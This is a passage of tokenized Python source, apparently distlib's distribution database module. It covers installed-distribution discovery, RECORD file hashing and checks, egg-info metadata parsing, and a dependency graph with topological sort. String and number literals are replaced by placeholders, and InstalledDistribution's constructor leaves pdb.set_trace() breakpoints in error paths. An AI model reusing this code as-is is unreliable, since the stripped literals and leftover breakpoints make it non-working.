= True <EOL> self . _include_egg = include_egg <EOL> self . _cache = _Cache ( ) <EOL> self . _cache_egg = _Cache ( ) <EOL> self . _cache_enabled = True <EOL> self . _scheme = get_scheme ( '<STR_LIT:default>' ) <EOL> def _get_cache_enabled ( self ) : <EOL> return self . _cache_enabled <EOL> def _set_cache_enabled ( self , value ) : <EOL> self . _cache_enabled = value <EOL> cache_enabled = property ( _get_cache_enabled , _set_cache_enabled ) <EOL> def clear_cache ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _cache . clear ( ) <EOL> self . _cache_egg . clear ( ) <EOL> def _yield_distributions ( self ) : <EOL> """<STR_LIT>""" <EOL> seen = set ( ) <EOL> for path in self . path : <EOL> finder = resources . finder_for_path ( path ) <EOL> if finder is None : <EOL> continue <EOL> r = finder . find ( '<STR_LIT>' ) <EOL> if not r or not r . is_container : <EOL> continue <EOL> rset = sorted ( r . resources ) <EOL> for entry in rset : <EOL> r = finder . find ( entry ) <EOL> if not r or r . path in seen : <EOL> continue <EOL> if self . _include_dist and entry . endswith ( DISTINFO_EXT ) : <EOL> possible_filenames = [ METADATA_FILENAME , WHEEL_METADATA_FILENAME ] <EOL> for metadata_filename in possible_filenames : <EOL> metadata_path = posixpath . join ( entry , metadata_filename ) <EOL> pydist = finder . find ( metadata_path ) <EOL> if pydist : <EOL> break <EOL> else : <EOL> continue <EOL> with contextlib . closing ( pydist . as_stream ( ) ) as stream : <EOL> metadata = Metadata ( fileobj = stream , scheme = '<STR_LIT>' ) <EOL> logger . debug ( '<STR_LIT>' , r . path ) <EOL> seen . add ( r . path ) <EOL> yield new_dist_class ( r . path , metadata = metadata , <EOL> env = self ) <EOL> elif self . _include_egg and entry . endswith ( ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) ) : <EOL> logger . debug ( '<STR_LIT>' , r . path ) <EOL> seen . add ( r . path ) <EOL> yield old_dist_class ( r . path , self ) <EOL> def _generate_cache ( self ) : <EOL> """<STR_LIT>""" <EOL> gen_dist = not self . _cache . generated <EOL> gen_egg = self . _include_egg and not self . _cache_egg . generated <EOL> if gen_dist or gen_egg : <EOL> for dist in self . _yield_distributions ( ) : <EOL> if isinstance ( dist , InstalledDistribution ) : <EOL> self . _cache . add ( dist ) <EOL> else : <EOL> self . _cache_egg . add ( dist ) <EOL> if gen_dist : <EOL> self . _cache . generated = True <EOL> if gen_egg : <EOL> self . _cache_egg . generated = True <EOL> @ classmethod <EOL> def distinfo_dirname ( cls , name , version ) : <EOL> """<STR_LIT>""" <EOL> name = name . replace ( '<STR_LIT:->' , '<STR_LIT:_>' ) <EOL> return '<STR_LIT:->' . join ( [ name , version ] ) + DISTINFO_EXT <EOL> def get_distributions ( self ) : <EOL> """<STR_LIT>""" <EOL> if not self . _cache_enabled : <EOL> for dist in self . _yield_distributions ( ) : <EOL> yield dist <EOL> else : <EOL> self . _generate_cache ( ) <EOL> for dist in self . _cache . path . values ( ) : <EOL> yield dist <EOL> if self . _include_egg : <EOL> for dist in self . _cache_egg . path . values ( ) : <EOL> yield dist <EOL> def get_distribution ( self , name ) : <EOL> """<STR_LIT>""" <EOL> result = None <EOL> name = name . lower ( ) <EOL> if not self . _cache_enabled : <EOL> for dist in self . _yield_distributions ( ) : <EOL> if dist . key == name : <EOL> result = dist <EOL> break <EOL> else : <EOL> self . _generate_cache ( ) <EOL> if name in self . _cache . name : <EOL> result = self . _cache . name [ name ] [ <NUM_LIT:0> ] <EOL> elif self . _include_egg and name in self . _cache_egg . name : <EOL> result = self . _cache_egg . name [ name ] [ <NUM_LIT:0> ] <EOL> return result <EOL> def provides_distribution ( self , name , version = None ) : <EOL> """<STR_LIT>""" <EOL> matcher = None <EOL> if not version is None : <EOL> try : <EOL> matcher = self . _scheme . matcher ( '<STR_LIT>' % ( name , version ) ) <EOL> except ValueError : <EOL> raise DistlibException ( '<STR_LIT>' % <EOL> ( name , version ) ) <EOL> for dist in self . get_distributions ( ) : <EOL> provided = dist . provides <EOL> for p in provided : <EOL> p_name , p_ver = parse_name_and_version ( p ) <EOL> if matcher is None : <EOL> if p_name == name : <EOL> yield dist <EOL> break <EOL> else : <EOL> if p_name == name and matcher . match ( p_ver ) : <EOL> yield dist <EOL> break <EOL> def get_file_path ( self , name , relative_path ) : <EOL> """<STR_LIT>""" <EOL> dist = self . get_distribution ( name ) <EOL> if dist is None : <EOL> raise LookupError ( '<STR_LIT>' % name ) <EOL> return dist . get_resource_path ( relative_path ) <EOL> def get_exported_entries ( self , category , name = None ) : <EOL> """<STR_LIT>""" <EOL> for dist in self . get_distributions ( ) : <EOL> r = dist . exports <EOL> if category in r : <EOL> d = r [ category ] <EOL> if name is not None : <EOL> if name in d : <EOL> yield d [ name ] <EOL> else : <EOL> for v in d . values ( ) : <EOL> yield v <EOL> class Distribution ( object ) : <EOL> """<STR_LIT>""" <EOL> build_time_dependency = False <EOL> """<STR_LIT>""" <EOL> requested = False <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , metadata ) : <EOL> """<STR_LIT>""" <EOL> self . metadata = metadata <EOL> self . name = metadata . name <EOL> self . key = self . name . lower ( ) <EOL> self . version = metadata . version <EOL> self . locator = None <EOL> self . digest = None <EOL> self . extras = None <EOL> self . context = None <EOL> self . download_urls = set ( ) <EOL> self . digests = { } <EOL> @ property <EOL> def source_url ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . metadata . source_url <EOL> download_url = source_url <EOL> @ property <EOL> def name_and_version ( self ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' % ( self . name , self . version ) <EOL> @ property <EOL> def provides ( self ) : <EOL> """<STR_LIT>""" <EOL> plist = self . metadata . provides <EOL> s = '<STR_LIT>' % ( self . name , self . version ) <EOL> if s not in plist : <EOL> plist . append ( s ) <EOL> return plist <EOL> def _get_requirements ( self , req_attr ) : <EOL> md = self . metadata <EOL> logger . debug ( '<STR_LIT>' , md . todict ( ) ) <EOL> reqts = getattr ( md , req_attr ) <EOL> return set ( md . get_requirements ( reqts , extras = self . extras , <EOL> env = self . context ) ) <EOL> @ property <EOL> def run_requires ( self ) : <EOL> return self . _get_requirements ( '<STR_LIT>' ) <EOL> @ property <EOL> def meta_requires ( self ) : <EOL> return self . _get_requirements ( '<STR_LIT>' ) <EOL> @ property <EOL> def build_requires ( self ) : <EOL> return self . _get_requirements ( '<STR_LIT>' ) <EOL> @ property <EOL> def test_requires ( self ) : <EOL> return self . _get_requirements ( '<STR_LIT>' ) <EOL> @ property <EOL> def dev_requires ( self ) : <EOL> return self . _get_requirements ( '<STR_LIT>' ) <EOL> def matches_requirement ( self , req ) : <EOL> """<STR_LIT>""" <EOL> r = parse_requirement ( req ) <EOL> scheme = get_scheme ( self . metadata . scheme ) <EOL> try : <EOL> matcher = scheme . matcher ( r . requirement ) <EOL> except UnsupportedVersionError : <EOL> logger . warning ( '<STR_LIT>' , <EOL> req ) <EOL> name = req . split ( ) [ <NUM_LIT:0> ] <EOL> matcher = scheme . matcher ( name ) <EOL> name = matcher . key <EOL> result = False <EOL> for p in self . provides : <EOL> p_name , p_ver = parse_name_and_version ( p ) <EOL> if p_name != name : <EOL> continue <EOL> try : <EOL> result = matcher . match ( p_ver ) <EOL> break <EOL> except UnsupportedVersionError : <EOL> pass <EOL> return result <EOL> def __repr__ ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . source_url : <EOL> suffix = '<STR_LIT>' % self . source_url <EOL> else : <EOL> suffix = '<STR_LIT>' <EOL> return '<STR_LIT>' % ( self . name , self . version , suffix ) <EOL> def __eq__ ( self , other ) : <EOL> """<STR_LIT>""" <EOL> if type ( other ) is not type ( self ) : <EOL> result = False <EOL> else : <EOL> result = ( self . name == other . name and <EOL> self . version == other . version and <EOL> self . source_url == other . source_url ) <EOL> return result <EOL> def __hash__ ( self ) : <EOL> """<STR_LIT>""" <EOL> return hash ( self . name ) + hash ( self . version ) + hash ( self . source_url ) <EOL> class BaseInstalledDistribution ( Distribution ) : <EOL> """<STR_LIT>""" <EOL> hasher = None <EOL> def __init__ ( self , metadata , path , env = None ) : <EOL> """<STR_LIT>""" <EOL> super ( BaseInstalledDistribution , self ) . __init__ ( metadata ) <EOL> self . path = path <EOL> self . dist_path = env <EOL> def get_hash ( self , data , hasher = None ) : <EOL> """<STR_LIT>""" <EOL> if hasher is None : <EOL> hasher = self . hasher <EOL> if hasher is None : <EOL> hasher = hashlib . md5 <EOL> prefix = '<STR_LIT>' <EOL> else : <EOL> hasher = getattr ( hashlib , hasher ) <EOL> prefix = '<STR_LIT>' % self . hasher <EOL> digest = hasher ( data ) . digest ( ) <EOL> digest = base64 . urlsafe_b64encode ( digest ) . rstrip ( b'<STR_LIT:=>' ) . decode ( '<STR_LIT:ascii>' ) <EOL> return '<STR_LIT>' % ( prefix , digest ) <EOL> class InstalledDistribution ( BaseInstalledDistribution ) : <EOL> """<STR_LIT>""" <EOL> hasher = '<STR_LIT>' <EOL> def __init__ ( self , path , metadata = None , env = None ) : <EOL> self . finder = finder = resources . finder_for_path ( path ) <EOL> if finder is None : <EOL> import pdb ; pdb . set_trace ( ) <EOL> if env and env . _cache_enabled and path in env . _cache . path : <EOL> metadata = env . _cache . path [ path ] . metadata <EOL> elif metadata is None : <EOL> r = finder . find ( METADATA_FILENAME ) <EOL> if r is None : <EOL> r = finder . find ( WHEEL_METADATA_FILENAME ) <EOL> if r is None : <EOL> r = finder . find ( '<STR_LIT>' ) <EOL> if r is None : <EOL> raise ValueError ( '<STR_LIT>' % ( METADATA_FILENAME , <EOL> path ) ) <EOL> with contextlib . closing ( r . as_stream ( ) ) as stream : <EOL> metadata = Metadata ( fileobj = stream , scheme = '<STR_LIT>' ) <EOL> super ( InstalledDistribution , self ) . __init__ ( metadata , path , env ) <EOL> if env and env . _cache_enabled : <EOL> env . _cache . add ( self ) <EOL> try : <EOL> r = finder . find ( '<STR_LIT>' ) <EOL> except AttributeError : <EOL> import pdb ; pdb . set_trace ( ) <EOL> self . requested = r is not None <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % ( <EOL> self . name , self . version , self . path ) <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" % ( self . name , self . version ) <EOL> def _get_records ( self ) : <EOL> """<STR_LIT>""" <EOL> results = [ ] <EOL> r = self . get_distinfo_resource ( '<STR_LIT>' ) <EOL> with contextlib . closing ( r . as_stream ( ) ) as stream : <EOL> with CSVReader ( stream = stream ) as record_reader : <EOL> for row in record_reader : <EOL> missing = [ None for i in range ( len ( row ) , <NUM_LIT:3> ) ] <EOL> path , checksum , size = row + missing <EOL> results . append ( ( path , checksum , size ) ) <EOL> return results <EOL> @ cached_property <EOL> def exports ( self ) : <EOL> """<STR_LIT>""" <EOL> result = { } <EOL> r = self . get_distinfo_resource ( EXPORTS_FILENAME ) <EOL> if r : <EOL> result = self . read_exports ( ) <EOL> return result <EOL> def read_exports ( self ) : <EOL> """<STR_LIT>""" <EOL> result = { } <EOL> r = self . get_distinfo_resource ( EXPORTS_FILENAME ) <EOL> if r : <EOL> with contextlib . closing ( r . as_stream ( ) ) as stream : <EOL> result = read_exports ( stream ) <EOL> return result <EOL> def write_exports ( self , exports ) : <EOL> """<STR_LIT>""" <EOL> rf = self . get_distinfo_file ( EXPORTS_FILENAME ) <EOL> with open ( rf , '<STR_LIT:w>' ) as f : <EOL> write_exports ( exports , f ) <EOL> def get_resource_path ( self , relative_path ) : <EOL> """<STR_LIT>""" <EOL> r = self . get_distinfo_resource ( '<STR_LIT>' ) <EOL> with contextlib . closing ( r . as_stream ( ) ) as stream : <EOL> with CSVReader ( stream = stream ) as resources_reader : <EOL> for relative , destination in resources_reader : <EOL> if relative == relative_path : <EOL> return destination <EOL> raise KeyError ( '<STR_LIT>' <EOL> '<STR_LIT>' % relative_path ) <EOL> def list_installed_files ( self ) : <EOL> """<STR_LIT>""" <EOL> for result in self . _get_records ( ) : <EOL> yield result <EOL> def write_installed_files ( self , paths , prefix , dry_run = False ) : <EOL> """<STR_LIT>""" <EOL> prefix = os . path . join ( prefix , '<STR_LIT>' ) <EOL> base = os . path . dirname ( self . path ) <EOL> base_under_prefix = base . startswith ( prefix ) <EOL> base = os . path . join ( base , '<STR_LIT>' ) <EOL> record_path = self . get_distinfo_file ( '<STR_LIT>' ) <EOL> logger . info ( '<STR_LIT>' , record_path ) <EOL> if dry_run : <EOL> return None <EOL> with CSVWriter ( record_path ) as writer : <EOL> for path in paths : <EOL> if os . path . isdir ( path ) or path . endswith ( ( '<STR_LIT>' , '<STR_LIT>' ) ) : <EOL> hash_value = size = '<STR_LIT>' <EOL> else : <EOL> size = '<STR_LIT>' % os . path . getsize ( path ) <EOL> with open ( path , '<STR_LIT:rb>' ) as fp : <EOL> hash_value = self . get_hash ( fp . read ( ) ) <EOL> if path . startswith ( base ) or ( base_under_prefix and <EOL> path . startswith ( prefix ) ) : <EOL> path = os . path . relpath ( path , base ) <EOL> writer . writerow ( ( path , hash_value , size ) ) <EOL> if record_path . startswith ( base ) : <EOL> record_path = os . path . relpath ( record_path , base ) <EOL> writer . writerow ( ( record_path , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> return record_path <EOL> def check_installed_files ( self ) : <EOL> """<STR_LIT>""" <EOL> mismatches = [ ] <EOL> base = os . path . dirname ( self . path ) <EOL> record_path = self . get_distinfo_file ( '<STR_LIT>' ) <EOL> for path , hash_value , size in self . list_installed_files ( ) : <EOL> if not os . path . isabs ( path ) : <EOL> path = os . path . join ( base , path ) <EOL> if path == record_path : <EOL> continue <EOL> if not os . path . exists ( path ) : <EOL> mismatches . append ( ( path , '<STR_LIT>' , True , False ) ) <EOL> elif os . path . isfile ( path ) : <EOL> actual_size = str ( os . path . getsize ( path ) ) <EOL> if size and actual_size != size : <EOL> mismatches . append ( ( path , '<STR_LIT:size>' , size , actual_size ) ) <EOL> elif hash_value : <EOL> if '<STR_LIT:=>' in hash_value : <EOL> hasher = hash_value . split ( '<STR_LIT:=>' , <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> else : <EOL> hasher = None <EOL> with open ( path , '<STR_LIT:rb>' ) as f : <EOL> actual_hash = self . get_hash ( f . read ( ) , hasher ) <EOL> if actual_hash != hash_value : <EOL> mismatches . append ( ( path , '<STR_LIT>' , hash_value , actual_hash ) ) <EOL> return mismatches <EOL> @ cached_property <EOL> def shared_locations ( self ) : <EOL> """<STR_LIT>""" <EOL> result = { } <EOL> shared_path = os . path . join ( self . path , '<STR_LIT>' ) <EOL> if os . path . isfile ( shared_path ) : <EOL> with codecs . open ( shared_path , '<STR_LIT:r>' , encoding = '<STR_LIT:utf-8>' ) as f : <EOL> lines = f . read ( ) . splitlines ( ) <EOL> for line in lines : <EOL> key , value = line . split ( '<STR_LIT:=>' , <NUM_LIT:1> ) <EOL> if key == '<STR_LIT>' : <EOL> result . setdefault ( key , [ ] ) . append ( value ) <EOL> else : <EOL> result [ key ] = value <EOL> return result <EOL> def write_shared_locations ( self , paths , dry_run = False ) : <EOL> """<STR_LIT>""" <EOL> shared_path = os . path . join ( self . path , '<STR_LIT>' ) <EOL> logger . info ( '<STR_LIT>' , shared_path ) <EOL> if dry_run : <EOL> return None <EOL> lines = [ ] <EOL> for key in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:data>' ) : <EOL> path = paths [ key ] <EOL> if os . path . isdir ( paths [ key ] ) : <EOL> lines . append ( '<STR_LIT>' % ( key , path ) ) <EOL> for ns in paths . get ( '<STR_LIT>' , ( ) ) : <EOL> lines . append ( '<STR_LIT>' % ns ) <EOL> with codecs . open ( shared_path , '<STR_LIT:w>' , encoding = '<STR_LIT:utf-8>' ) as f : <EOL> f . write ( '<STR_LIT:\n>' . join ( lines ) ) <EOL> return shared_path <EOL> def get_distinfo_resource ( self , path ) : <EOL> if path not in DIST_FILES : <EOL> raise DistlibException ( '<STR_LIT>' <EOL> '<STR_LIT>' % ( path , self . path ) ) <EOL> finder = resources . finder_for_path ( self . path ) <EOL> if finder is None : <EOL> raise DistlibException ( '<STR_LIT>' % self . path ) <EOL> return finder . find ( path ) <EOL> def get_distinfo_file ( self , path ) : <EOL> """<STR_LIT>""" <EOL> if path . find ( os . sep ) >= <NUM_LIT:0> : <EOL> distinfo_dirname , path = path . split ( os . sep ) [ - <NUM_LIT:2> : ] <EOL> if distinfo_dirname != self . path . split ( os . sep ) [ - <NUM_LIT:1> ] : <EOL> raise DistlibException ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % ( path , self . name , self . version ) ) <EOL> if path not in DIST_FILES : <EOL> raise DistlibException ( '<STR_LIT>' <EOL> '<STR_LIT>' % ( path , self . path ) ) <EOL> return os . path . join ( self . path , path ) <EOL> def list_distinfo_files ( self ) : <EOL> """<STR_LIT>""" <EOL> base = os . path . dirname ( self . path ) <EOL> for path , checksum , size in self . _get_records ( ) : <EOL> if not os . path . isabs ( path ) : <EOL> path = os . path . join ( base , path ) <EOL> if path . startswith ( self . path ) : <EOL> yield path <EOL> def __eq__ ( self , other ) : <EOL> return ( isinstance ( other , InstalledDistribution ) and <EOL> self . path == other . path ) <EOL> __hash__ = object . __hash__ <EOL> class EggInfoDistribution ( BaseInstalledDistribution ) : <EOL> """<STR_LIT>""" <EOL> requested = True <EOL> shared_locations = { } <EOL> def __init__ ( self , path , env = None ) : <EOL> def set_name_and_version ( s , n , v ) : <EOL> s . name = n <EOL> s . key = n . lower ( ) <EOL> s . version = v <EOL> self . path = path <EOL> self . dist_path = env <EOL> if env and env . _cache_enabled and path in env . _cache_egg . path : <EOL> metadata = env . _cache_egg . path [ path ] . metadata <EOL> set_name_and_version ( self , metadata . name , metadata . version ) <EOL> else : <EOL> metadata = self . _get_metadata ( path ) <EOL> set_name_and_version ( self , metadata . name , metadata . version ) <EOL> if env and env . _cache_enabled : <EOL> env . _cache_egg . add ( self ) <EOL> super ( EggInfoDistribution , self ) . __init__ ( metadata , path , env ) <EOL> def _get_metadata ( self , path ) : <EOL> requires = None <EOL> def parse_requires_data ( data ) : <EOL> """<STR_LIT>""" <EOL> reqs = [ ] <EOL> lines = data . splitlines ( ) <EOL> for line in lines : <EOL> line = line . strip ( ) <EOL> if line . startswith ( '<STR_LIT:[>' ) : <EOL> logger . warning ( '<STR_LIT>' , <EOL> line ) <EOL> break <EOL> r = parse_requirement ( line ) <EOL> if not r : <EOL> logger . warning ( '<STR_LIT>' , line ) <EOL> continue <EOL> if r . extras : <EOL> logger . warning ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if not r . constraints : <EOL> reqs . append ( r . name ) <EOL> else : <EOL> cons = '<STR_LIT:U+002CU+0020>' . join ( '<STR_LIT>' % c for c in r . constraints ) <EOL> reqs . append ( '<STR_LIT>' % ( r . name , cons ) ) <EOL> return reqs <EOL> def parse_requires_path ( req_path ) : <EOL> """<STR_LIT>""" <EOL> reqs = [ ] <EOL> try : <EOL> with codecs . open ( req_path , '<STR_LIT:r>' , '<STR_LIT:utf-8>' ) as fp : <EOL> reqs = parse_requires_data ( fp . read ( ) ) <EOL> except IOError : <EOL> pass <EOL> return reqs <EOL> if path . endswith ( '<STR_LIT>' ) : <EOL> if os . path . isdir ( path ) : <EOL> meta_path = os . path . join ( path , '<STR_LIT>' , '<STR_LIT>' ) <EOL> metadata = Metadata ( path = meta_path , scheme = '<STR_LIT>' ) <EOL> req_path = os . path . join ( path , '<STR_LIT>' , '<STR_LIT>' ) <EOL> requires = parse_requires_path ( req_path ) <EOL> else : <EOL> zipf = zipimport . zipimporter ( path ) <EOL> fileobj = StringIO ( <EOL> zipf . get_data ( '<STR_LIT>' ) . decode ( '<STR_LIT:utf8>' ) ) <EOL> metadata = Metadata ( fileobj = fileobj , scheme = '<STR_LIT>' ) <EOL> try : <EOL> data = zipf . get_data ( '<STR_LIT>' ) <EOL> requires = parse_requires_data ( data . decode ( '<STR_LIT:utf-8>' ) ) <EOL> except IOError : <EOL> requires = None <EOL> elif path . endswith ( '<STR_LIT>' ) : <EOL> if os . path . isdir ( path ) : <EOL> req_path = os . path . join ( path , '<STR_LIT>' ) <EOL> requires = parse_requires_path ( req_path ) <EOL> path = os . path . join ( path , '<STR_LIT>' ) <EOL> metadata = Metadata ( path = path , scheme = '<STR_LIT>' ) <EOL> else : <EOL> raise DistlibException ( '<STR_LIT>' <EOL> '<STR_LIT>' % path ) <EOL> if requires : <EOL> metadata . add_requirements ( requires ) <EOL> return metadata <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % ( <EOL> self . name , self . version , self . path ) <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" % ( self . name , self . version ) <EOL> def check_installed_files ( self ) : <EOL> """<STR_LIT>""" <EOL> mismatches = [ ] <EOL> record_path = os . path . join ( self . path , '<STR_LIT>' ) <EOL> if os . path . exists ( record_path ) : <EOL> for path , _ , _ in self . list_installed_files ( ) : <EOL> if path == record_path : <EOL> continue <EOL> if not os . path . exists ( path ) : <EOL> mismatches . append ( ( path , '<STR_LIT>' , True , False ) ) <EOL> return mismatches <EOL> def list_installed_files ( self ) : <EOL> """<STR_LIT>""" <EOL> def _md5 ( path ) : <EOL> f = open ( path , '<STR_LIT:rb>' ) <EOL> try : <EOL> content = f . read ( ) <EOL> finally : <EOL> f . close ( ) <EOL> return hashlib . md5 ( content ) . hexdigest ( ) <EOL> def _size ( path ) : <EOL> return os . stat ( path ) . st_size <EOL> record_path = os . path . join ( self . path , '<STR_LIT>' ) <EOL> result = [ ] <EOL> if os . path . exists ( record_path ) : <EOL> with codecs . open ( record_path , '<STR_LIT:r>' , encoding = '<STR_LIT:utf-8>' ) as f : <EOL> for line in f : <EOL> line = line . strip ( ) <EOL> p = os . path . normpath ( os . path . join ( self . path , line ) ) <EOL> if not os . path . exists ( p ) : <EOL> logger . warning ( '<STR_LIT>' , p ) <EOL> if p . endswith ( ( '<STR_LIT>' , '<STR_LIT>' ) ) : <EOL> continue <EOL> if not os . path . isdir ( p ) : <EOL> result . append ( ( p , _md5 ( p ) , _size ( p ) ) ) <EOL> result . append ( ( record_path , None , None ) ) <EOL> return result <EOL> def list_distinfo_files ( self , absolute = False ) : <EOL> """<STR_LIT>""" <EOL> record_path = os . path . join ( self . path , '<STR_LIT>' ) <EOL> skip = True <EOL> with codecs . open ( record_path , '<STR_LIT:r>' , encoding = '<STR_LIT:utf-8>' ) as f : <EOL> for line in f : <EOL> line = line . strip ( ) <EOL> if line == '<STR_LIT>' : <EOL> skip = False <EOL> continue <EOL> if not skip : <EOL> p = os . path . normpath ( os . path . join ( self . path , line ) ) <EOL> if p . startswith ( self . path ) : <EOL> if absolute : <EOL> yield p <EOL> else : <EOL> yield line <EOL> def __eq__ ( self , other ) : <EOL> return ( isinstance ( other , EggInfoDistribution ) and <EOL> self . path == other . path ) <EOL> __hash__ = object . __hash__ <EOL> new_dist_class = InstalledDistribution <EOL> old_dist_class = EggInfoDistribution <EOL> class DependencyGraph ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . adjacency_list = { } <EOL> self . reverse_list = { } <EOL> self . missing = { } <EOL> def add_distribution ( self , distribution ) : <EOL> """<STR_LIT>""" <EOL> self . adjacency_list [ distribution ] = [ ] <EOL> self . reverse_list [ distribution ] = [ ] <EOL> def add_edge ( self , x , y , label = None ) : <EOL> """<STR_LIT>""" <EOL> self . adjacency_list [ x ] . append ( ( y , label ) ) <EOL> if x not in self . reverse_list [ y ] : <EOL> self . reverse_list [ y ] . append ( x ) <EOL> def add_missing ( self , distribution , requirement ) : <EOL> """<STR_LIT>""" <EOL> logger . debug ( '<STR_LIT>' , distribution , requirement ) <EOL> self . missing . setdefault ( distribution , [ ] ) . append ( requirement ) <EOL> def _repr_dist ( self , dist ) : <EOL> return '<STR_LIT>' % ( dist . name , dist . version ) <EOL> def repr_node ( self , dist , level = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> output = [ self . _repr_dist ( dist ) ] <EOL> for other , label in self . adjacency_list [ dist ] : <EOL> dist = self . _repr_dist ( other ) <EOL> if label is not None : <EOL> dist = '<STR_LIT>' % ( dist , label ) <EOL> output . append ( '<STR_LIT:U+0020>' * level + str ( dist ) ) <EOL> suboutput = self . repr_node ( other , level + <NUM_LIT:1> ) <EOL> subs = suboutput . split ( '<STR_LIT:\n>' ) <EOL> output . extend ( subs [ <NUM_LIT:1> : ] ) <EOL> return '<STR_LIT:\n>' . join ( output ) <EOL> def to_dot ( self , f , skip_disconnected = True ) : <EOL> """<STR_LIT>""" <EOL> disconnected = [ ] <EOL> f . write ( "<STR_LIT>" ) <EOL> for dist , adjs in self . adjacency_list . items ( ) : <EOL> if len ( adjs ) == <NUM_LIT:0> and not skip_disconnected : <EOL> disconnected . append ( dist ) <EOL> for other , label in adjs : <EOL> if not label is None : <EOL> f . write ( '<STR_LIT>' % <EOL> ( dist . name , other . name , label ) ) <EOL> else : <EOL> f . write ( '<STR_LIT>' % ( dist . name , other . name ) ) <EOL> if not skip_disconnected and len ( disconnected ) > <NUM_LIT:0> : <EOL> f . write ( '<STR_LIT>' ) <EOL> f . write ( '<STR_LIT>' ) <EOL> f . write ( '<STR_LIT>' ) <EOL> for dist in disconnected : <EOL> f . write ( '<STR_LIT>' % dist . name ) <EOL> f . write ( '<STR_LIT:\n>' ) <EOL> f . write ( '<STR_LIT>' ) <EOL> f . write ( '<STR_LIT>' ) <EOL> def topological_sort ( self ) : <EOL> """<STR_LIT>""" <EOL> result = [ ] <EOL> alist = { } <EOL> for k , v in self . adjacency_list . items ( ) : <EOL> alist [ k ] = v [ : ] <EOL> while True : <EOL> to_remove = [ ] <EOL> for k , v in list ( alist . items ( ) ) [ : ] : <EOL> if not v : <EOL> to_remove . append ( k ) <EOL> del alist [ k ] <EOL> if not to_remove : <EOL> break <EOL> for k , v in alist . items ( ) : <EOL> alist [ k ] = [ ( d , r ) for d , r in v if d not in to_remove ] <EOL> logger . debug ( '<STR_LIT>' , <EOL> [ '<STR_LIT>' % ( d . name , d . version ) for d in to_remove ] ) <EOL> result . extend ( to_remove ) <EOL> return result , list ( alist . keys ( ) ) <EOL> def __repr__ ( self ) : <EOL> """<STR_LIT>""" <EOL> output = [ ] <EOL> for dist , adjs in self . adjacency_list . items ( ) : <EOL> output . append ( self . repr_node ( dist ) ) <EOL> return '<STR_LIT:\n>' . join ( output ) <EOL> def make_graph ( dists , scheme = '<STR_LIT:default>' ) : <EOL> """<STR_LIT>""" <EOL> scheme = get_scheme ( scheme ) <EOL> graph = DependencyGraph ( ) <EOL> provided = { } <EOL> for dist in dists : <EOL> graph . add_distribution ( dist ) <EOL> for p in dist . provides : <EOL> name , version = parse_name_and_version ( p ) <EOL> logger . debug ( '<STR_LIT>' , name , version , dist ) <EOL> provided . setdefault ( name , [ ] ) . append ( ( version , dist ) ) <EOL> for dist in dists : <EOL> requires = ( dist . run_requires | dist . meta_requires | <EOL> dist . build_requires | dist . dev_requires ) <EOL> for req in requires : <EOL> try : <EOL> matcher = scheme . matcher ( req ) <EOL> except UnsupportedVersionError : <EOL> logger . warning ( '<STR_LIT>' , <EOL> req ) <EOL> name = req . split ( ) [ <NUM_LIT:0> ] <EOL> matcher = scheme . matcher ( name ) <EOL> name = matcher . key <EOL> matched = False <EOL> if name in provided : <EOL> for version , provider in provided [ name ] : <EOL> try : <EOL> match = matcher . match ( version ) <EOL> except UnsupportedVersionError : <EOL> match = False <EOL> if match : <EOL> graph . add_edge ( dist , provider , req ) <EOL> matched = True <EOL> break <EOL> if not matched : <EOL> graph . add_missing ( dist , req ) <EOL> return graph <EOL> def get_dependent_dists ( dists , dist ) : <EOL> """<STR_LIT>""" <EOL> if dist not in dists : <EOL> raise DistlibException ( '<STR_LIT>' <EOL> '<STR_LIT>' % dist . name ) <EOL> graph = make_graph ( dists ) <EOL> dep = [ dist ] <EOL> todo = graph . reverse_list [ dist ] <EOL> while todo : <EOL> d = todo . pop ( ) <EOL> dep . append ( d ) <EOL> for succ in graph . reverse_list [ d ] : <EOL> if succ not in dep : <EOL> todo . append ( succ ) <EOL> dep . pop ( <NUM_LIT:0> ) <EOL> return dep <EOL> def get_required_dists ( dists , dist ) : <EOL> """<STR_LIT>""" <EOL> if dist not in dists : <EOL> raise DistlibException ( '<STR_LIT>' <EOL> '<STR_LIT>' % dist . name ) <EOL> graph = make_graph ( dists ) <EOL> req = [ ] <EOL> todo = graph . adjacency_list [ dist ] <EOL> while todo : <EOL> d = todo . pop ( ) [ <NUM_LIT:0> ] <EOL> req . append ( d ) <EOL> for pred in graph . adjacency_list [ d ] : <EOL> if pred not in req : <EOL> todo . append ( pred ) <EOL> return req <EOL> def make_dist ( name , version , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> summary = kwargs . pop ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> md = Metadata ( ** kwargs ) <EOL> md . name = name <EOL> md . version = version <EOL> md . summary = summary or '<STR_LIT>' <EOL> return Distribution ( md ) </s>
